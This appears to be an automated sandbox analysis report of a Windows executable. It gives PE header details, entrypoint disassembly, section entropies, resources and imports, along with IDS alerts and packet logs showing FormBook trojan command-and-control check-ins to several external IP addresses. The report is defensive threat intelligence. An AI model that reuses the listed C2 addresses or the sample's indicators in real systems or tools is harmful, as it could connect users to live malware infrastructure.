File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66872723 [Thu Jul 4 22:50:11 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F4058BBAC1Dh
jmp 00007F4058BAD9D4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F4058BADB5Ah
cmp edi, eax
jc 00007F4058BADEBEh
bt dword ptr [004C41FCh], 01h
jnc 00007F4058BADB59h
rep movsb
jmp 00007F4058BADE6Ch
cmp ecx, 00000080h
jc 00007F4058BADD24h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F4058BADB60h
bt dword ptr [004BF324h], 01h
jc 00007F4058BAE030h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F4058BADCFDh
test edi, 00000003h
jne 00007F4058BADD0Eh
test esi, 00000003h
jne 00007F4058BADCEDh
bt edi, 02h
jnc 00007F4058BADB5Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F4058BADB63h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F4058BADBB5h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x54d94	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11d000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x54d94	0x54e00	dd3d4003ecea5db9eee05f66be43fb64	False	0.9229392949189985	data	7.882415428304826	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11d000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc85a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc86d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc87f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc8c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc8d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xca480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xca9e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xce038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xce4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xce4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcea84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcf110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcfb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd01f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd0660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd07b8	0x4c05a	data			1.0003243562652142
RT_GROUP_ICON	0x11c814	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x11c88c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x11c8a0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x11c8b4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x11c8c8	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x11c9a4	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/05/24-03:25:39.522626	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	52679	80	192.168.2.4	35.190.52.58
07/05/24-03:25:17.434107	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	52675	80	192.168.2.4	38.47.232.224
07/05/24-03:25:47.112498	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	52682	80	192.168.2.4	35.190.52.58
07/05/24-03:25:25.040218	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	52678	80	192.168.2.4	38.47.232.224
07/05/24-03:22:44.137161	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	52653	80	192.168.2.4	116.213.43.190
07/05/24-03:23:49.082597	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	52662	80	192.168.2.4	116.213.43.190
07/05/24-03:25:19.972876	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	52676	80	192.168.2.4	38.47.232.224
07/05/24-03:22:36.484948	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	52650	80	192.168.2.4	116.213.43.190
07/05/24-03:24:37.238794	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	52670	80	192.168.2.4	116.213.43.190
07/05/24-03:25:06.504222	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	52672	80	192.168.2.4	13.248.169.48
07/05/24-03:25:42.054601	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	52680	80	192.168.2.4	35.190.52.58
07/05/24-03:25:03.943847	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	52671	80	192.168.2.4	13.248.169.48
07/05/24-03:23:29.912994	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	52656	80	192.168.2.4	147.92.36.231
07/05/24-03:24:29.616614	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	52667	80	192.168.2.4	116.213.43.190
07/05/24-03:24:15.863599	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	52663	80	192.168.2.4	203.161.55.102
07/05/24-03:24:23.613781	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	52666	80	192.168.2.4	203.161.55.102
07/05/24-03:25:11.574084	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	52674	80	192.168.2.4	13.248.169.48
07/05/24-03:23:44.022116	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	52660	80	192.168.2.4	116.213.43.190
07/05/24-03:23:34.991939	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	52658	80	192.168.2.4	147.92.36.231
07/05/24-03:23:41.421571	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	52659	80	192.168.2.4	116.213.43.190
07/05/24-03:23:27.380572	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	52655	80	192.168.2.4	147.92.36.231
07/05/24-03:22:20.185133	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	52649	80	192.168.2.4	165.154.0.120
07/05/24-03:24:32.160099	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	52668	80	192.168.2.4	116.213.43.190
07/05/24-03:22:39.023005	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	52651	80	192.168.2.4	116.213.43.190
07/05/24-03:24:18.527866	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	52664	80	192.168.2.4	203.161.55.102

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 5, 2024 03:22:20.177103043 CEST	52649	80	192.168.2.4	165.154.0.120
Jul 5, 2024 03:22:20.182220936 CEST	80	52649	165.154.0.120	192.168.2.4
Jul 5, 2024 03:22:20.182301044 CEST	52649	80	192.168.2.4	165.154.0.120
Jul 5, 2024 03:22:20.185132980 CEST	52649	80	192.168.2.4	165.154.0.120
Jul 5, 2024 03:22:20.191868067 CEST	80	52649	165.154.0.120	192.168.2.4
Jul 5, 2024 03:22:21.092497110 CEST	80	52649	165.154.0.120	192.168.2.4
Jul 5, 2024 03:22:21.092509031 CEST	80	52649	165.154.0.120	192.168.2.4
Jul 5, 2024 03:22:21.092519045 CEST	80	52649	165.154.0.120	192.168.2.4
Jul 5, 2024 03:22:21.092612028 CEST	80	52649	165.154.0.120	192.168.2.4
Jul 5, 2024 03:22:21.092622042 CEST	80	52649	165.154.0.120	192.168.2.4
Jul 5, 2024 03:22:21.092629910 CEST	52649	80	192.168.2.4	165.154.0.120
Jul 5, 2024 03:22:21.092677116 CEST	52649	80	192.168.2.4	165.154.0.120
Jul 5, 2024 03:22:21.092835903 CEST	80	52649	165.154.0.120	192.168.2.4
Jul 5, 2024 03:22:21.092886925 CEST	52649	80	192.168.2.4	165.154.0.120
Jul 5, 2024 03:22:21.098623037 CEST	52649	80	192.168.2.4	165.154.0.120
Jul 5, 2024 03:22:21.103367090 CEST	80	52649	165.154.0.120	192.168.2.4
Jul 5, 2024 03:22:36.478496075 CEST	52650	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:22:36.483388901 CEST	80	52650	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:36.483464956 CEST	52650	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:22:36.484947920 CEST	52650	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:22:36.489727020 CEST	80	52650	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:37.995671034 CEST	52650	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:22:38.044158936 CEST	80	52650	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:39.013386011 CEST	52651	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:22:39.018305063 CEST	80	52651	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:39.018472910 CEST	52651	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:22:39.023005009 CEST	52651	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:22:39.030899048 CEST	80	52651	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:40.525337934 CEST	52651	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:22:40.732239962 CEST	80	52651	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:41.576318979 CEST	52652	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:22:41.581331968 CEST	80	52652	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:41.581399918 CEST	52652	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:22:41.598918915 CEST	52652	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:22:41.604880095 CEST	80	52652	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:41.604892015 CEST	80	52652	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:41.604898930 CEST	80	52652	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:41.604907990 CEST	80	52652	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:41.605000019 CEST	80	52652	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:41.605009079 CEST	80	52652	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:41.605125904 CEST	80	52652	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:41.605135918 CEST	80	52652	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:41.605257988 CEST	80	52652	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:43.103471994 CEST	52652	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:22:43.152134895 CEST	80	52652	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:44.130523920 CEST	52653	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:22:44.135396957 CEST	80	52653	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:44.135505915 CEST	52653	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:22:44.137161016 CEST	52653	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:22:44.142865896 CEST	80	52653	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:57.865730047 CEST	80	52650	116.213.43.190	192.168.2.4
Jul 5, 2024 03:22:57.865827084 CEST	52650	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:00.449481964 CEST	80	52651	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:00.449552059 CEST	52651	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:02.959502935 CEST	80	52652	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:02.959613085 CEST	52652	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:05.539014101 CEST	80	52653	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:05.539174080 CEST	52653	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:05.545726061 CEST	52653	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:05.550482035 CEST	80	52653	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:27.374212980 CEST	52655	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:27.379046917 CEST	80	52655	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:27.379117966 CEST	52655	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:27.380572081 CEST	52655	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:27.385345936 CEST	80	52655	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:28.318110943 CEST	80	52655	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:28.318231106 CEST	80	52655	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:28.325053930 CEST	52655	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:28.884692907 CEST	52655	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:29.906070948 CEST	52656	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:29.910960913 CEST	80	52656	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:29.911408901 CEST	52656	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:29.912993908 CEST	52656	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:29.917779922 CEST	80	52656	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:30.835377932 CEST	80	52656	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:30.841974974 CEST	80	52656	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:30.842024088 CEST	52656	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:31.415950060 CEST	52656	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:32.436057091 CEST	52657	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:32.440931082 CEST	80	52657	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:32.446140051 CEST	52657	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:32.449070930 CEST	52657	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:32.453888893 CEST	80	52657	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:32.453908920 CEST	80	52657	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:32.453975916 CEST	80	52657	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:32.453989029 CEST	80	52657	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:32.453996897 CEST	80	52657	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:32.454128981 CEST	80	52657	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:32.454138041 CEST	80	52657	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:32.454145908 CEST	80	52657	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:32.454169989 CEST	80	52657	147.92.36.231	192.168.2.4
